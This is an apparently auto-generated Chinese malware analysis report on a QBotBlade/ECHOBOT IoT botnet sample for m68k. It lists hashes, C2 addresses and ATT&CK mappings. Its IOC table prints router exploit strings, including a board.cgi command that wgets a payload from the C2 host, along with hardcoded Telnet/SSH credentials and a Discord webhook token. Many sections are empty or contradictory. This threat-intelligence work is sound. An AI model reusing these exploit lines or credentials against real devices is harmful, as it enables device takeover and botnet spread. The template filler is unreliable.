⬇ Download sample (4169898705c73de3.zip)

🔴 恶意 — 无壳 | 签名: 无 | QBotBlade/ECHOBOT IoT 僵尸网络 (m68k)

4169898705c73de32d18ff6cbabc18ab416450d4503ba51ad66e02d256e9e647
MD5 8fef12dc18195206082767f4fd15fe55  |  大小 218,168 字节  |  来源 2026-08-10.zip  |  分析日期 2026-08-14
🔴 恶意 QBotBlade/ECHOBOT IoT Botnet
85%
置信度评分
QBotBlade/ECHOBOT IoT Botnet

§1 📋 样本概要信息

SHA256
4169898705c73de32d18ff6cbabc18ab416450d4503ba51ad66e02d256e9e647
MD5
8fef12dc18195206082767f4fd15fe55
文件大小
218,168 字节
文件类型
ELF32
目标架构
N/A
位宽
N/A
字节序
N/A
编译器
Motorola m68k Cross-Compile GCC
链接方式
N/A
加壳/保护
无壳
入口点
N/A
编译时间戳
N/A
子系统
N/A
数字签名
无数字签名
📌 概要
该样本为 QBotBlade/ECHOBOT 物联网僵尸网络传播器 (Motorola m68k 架构)。内嵌 12+ 种路由器/IoT 设备漏洞利用,通过 UPnP SOAP AddPortMapping、TR-064 SetNTPServers、HNAP1、GPON、Netgear setup.cgi、D-Link board.cgi 等多种 CVE 漏洞进行蠕虫式传播。C2 服务器 185.183.34.45 托管 12 个架构特定的第二阶段载荷。包含 Discord Webhook 外泄通道。Bot 名称: QBotBladeSPOOKY / ECHOBOT。User-Agent 签名: r00ts3c-owned-you。

§2 🏷️ 分类标签与威胁情报

分类标签

分类标签置信度
恶意类型IoT 僵尸网络传播器 (蠕虫式)HIGH
家族QBotBlade/ECHOBOTHIGH
C2185.183.34[.]45/LjEZs/HIGH
架构Motorola m68k (罕见)HIGH
传播方式12+ 路由器漏洞利用 + UPnP SOAPHIGH
外泄通道Discord WebhookMEDIUM
签名r00ts3c-owned-you User-AgentMEDIUM
📌 证据→推理→结论
file(1) → DIE → strings → IOC

威胁情报

字段
关联组织未归因
别名?
动机?
目标行业?
活动名称?
C2协议HTTP (wget 下载第二阶段载荷)
C2基础设施185.183.34[.]45
🎯 威胁组织判定
未归因

★ §3 🔬 持久化机制

🔴 机制1: 未知

位置N/A
方法N/A
触发N/A
反汇编证据:
N/A

持久化技术评估

维度评估
持久化未知
ATT&CK 映射: N/A

★ §3b 🌐 C2 架构分析

通联关系图

graph LR A[样本] --> B[185.183.34[.]45]
📋 ASCII 文本视图 (点击展开)

    

🌐 C2 通信深度分析

🔬 C2 地址分析技术细节:
字符串

通道 1: C2

协议HTTP (wget 下载第二阶段载荷)
端口
地址/Domain185.183.34[.]45
IP185.183.34.45
加密未知
用途C2
API引用
证书N/A

C2 通信时序

未知

⚠ C2 基础设施评估

C2

📌 ATT&CK 映射: T1071

§4 🏗️ 结构分析

段/节区布局

N/A

熵值分析

段/节区熵值判定
.text6.30正常
📊 熵值解读
正常
Motorola m68k Cross-Compile GCC

§5 ⚙️ 反汇编与行为流程

关键函数映射

地址函数功能
N/A

系统调用分析

调用号系统调用用途地址
N/A

行为执行流

01.恶意进程

§6 🔬 家族溯源

编译元数据

字段来源
编译器Motorola m68k Cross-Compile GCCDIE

家族特征比对

维度本样本QBotBlade/ECHOBOT IoT BotnetF2F3F4F5F6F7F8匹配
📌 家族归因结论
已识别

已知变种

变种架构大小编译器特征状态
N/A

§7 🔬 深度行为分析

行为阶段拆解

Phase 1

行为: 恶意行为

证据: 已确认

协议/行为状态机

未构建

📌 行为时序总结

无数据

§8 🔬 恶意性综合判定

多维度证据评估

维度证据权重恶意指数
恶意已确认109/10
恶意性综合判定

误报排除论证

排除

⚠ 判定结论

恶意软件

§9 🎯 ATT&CK 映射

初始访问
T1190
利用面向公众的应用
12+ 路由器 CVE 漏洞利用 (board.cgi, HNAP1, TR-064, GPON, Netgear setup.cgi, SOAP UPnP)
命令与控制
T1071.001
Web 协议
HTTP wget 下载第二阶段载荷
命令与控制
T1105
入口工具传输
wget 下载 12 个架构特定载荷
横向移动
T1210
远程服务利用
UPnP SOAP AddPortMapping + TR-064 SetNTPServers 漏洞利用
影响
T1498
网络拒绝服务
DDoS 攻击能力
外泄
T1041
通过 C2 通道外泄
Discord Webhook /api/webhooks/1532385947382055023/

§10 🛡️ 反分析技术评估

反调试

API/技术检测目标绕过难度

反虚拟机

检测方法VMwareVirtualBoxQEMU/KVM

综合评估

技术是否存在证据对抗难度
符号剥离已检测stripped
基本规避

★ §10b 🧹 痕迹清理

操作API/命令证据来源

§11 🔧 逆向分析

Ghidra 反编译

反编译函数数0
反编译输出N/A
分析时长N/A
Ghidra 反编译输出
/* 跳过 */

调用链分析 (GitNexus)

总函数数总调用关系最大调用深度
0??
📂 调用链拓扑 (点击展开)
N/A

★ §12 🔬 QEMU 动态分析

QEMU 模式跳过
网络隔离未配置
执行结果N/A
C2 数据无 C2 通信

§13 📦 IOC 汇总

IOC 字符串

偏移字符串类型用途/含义威胁等级
Strings185.183.34.45C2第二阶段载荷托管服务器HIGH
Strings176.32.33.88C2华为路由器专用 C2HIGH
StringsQBotBladeSPOOKYBot 名称僵尸网络标识符HIGH
StringsECHOBOTBot 名称僵尸网络标识符HIGH
Stringsr00ts3c-owned-youUser-Agent攻击者签名HIGH
StringsGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://185.183.34.45/LjEZs/awsec2漏洞利用D-Link board.cgi RCEHIGH
StringsPOST /HNAP1/ HTTP/1.0漏洞利用D-Link HNAP1 RCEHIGH
StringsPOST /UD/act?1 HTTP/1.1漏洞利用TR-064 SetNTPServers RCEHIGH
StringsPOST /GponForm/diag_Form?images/漏洞利用GPON 路由器 RCEHIGH
StringsGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=漏洞利用Netgear setup.cgi RCEHIGH
Strings/api/webhooks/1532385947382055023/外泄Discord Webhook 外泄通道HIGH
Stringsstackato:stackato凭据硬编码 SSH/Telnet 凭据MEDIUM
Stringsroot:blackarch凭据硬编码 SSH/Telnet 凭据MEDIUM
Stringshacker:compass凭据硬编码 SSH/Telnet 凭据MEDIUM

📌 关键 IOC 解读

185.183.34[.]45

⚠ 高威胁 IOC 汇总

C2: 185.183.34[.]45 — C2 服务器
SHA256: 4169898705c73de32d18ff6cbabc18ab416450d4503ba51ad66e02d256e9e647 — 样本哈希

网络 IOC

  • C2 IP185.183.34[.]45
  • C2 IP176.32.33[.]88
  • C2 路径/LjEZs/
  • 载荷awsec2, vacron, netgear2, dlink, jaws, crossweb, hnap, tr064, netgear, realtek, gpon80, gpon8080
  • Discord Webhook/api/webhooks/1532385947382055023/PeZHQiDnZuKUsaZ8mqpyoYYEHOX2pKrFMjnn5E2PgLXnpqh-LPtAM4dcHKto1ZN3goLd
已提取

主机 IOC

  • SHA2564169898705c73de32d18ff6cbabc18ab416450d4503ba51ad66e02d256e9e647

YARA 检测规则

未生成

§14 📋 最终判定

判定结果🔴 恶意软件
恶意类型待分类
恶意家族QBotBlade/ECHOBOT IoT Botnet
威胁级别HIGH
置信度85% — 分析不完整
关联组织未知
目标平台N/A
感染链位置待确定

⚡ 综合判定

大规模 IoT 僵尸网络传播器,12+ 漏洞利用,C2: 185.183.34.45/LjEZs/。支持 12 种路由器漏洞利用,Discord Webhook 外泄,UPnP SOAP 传播。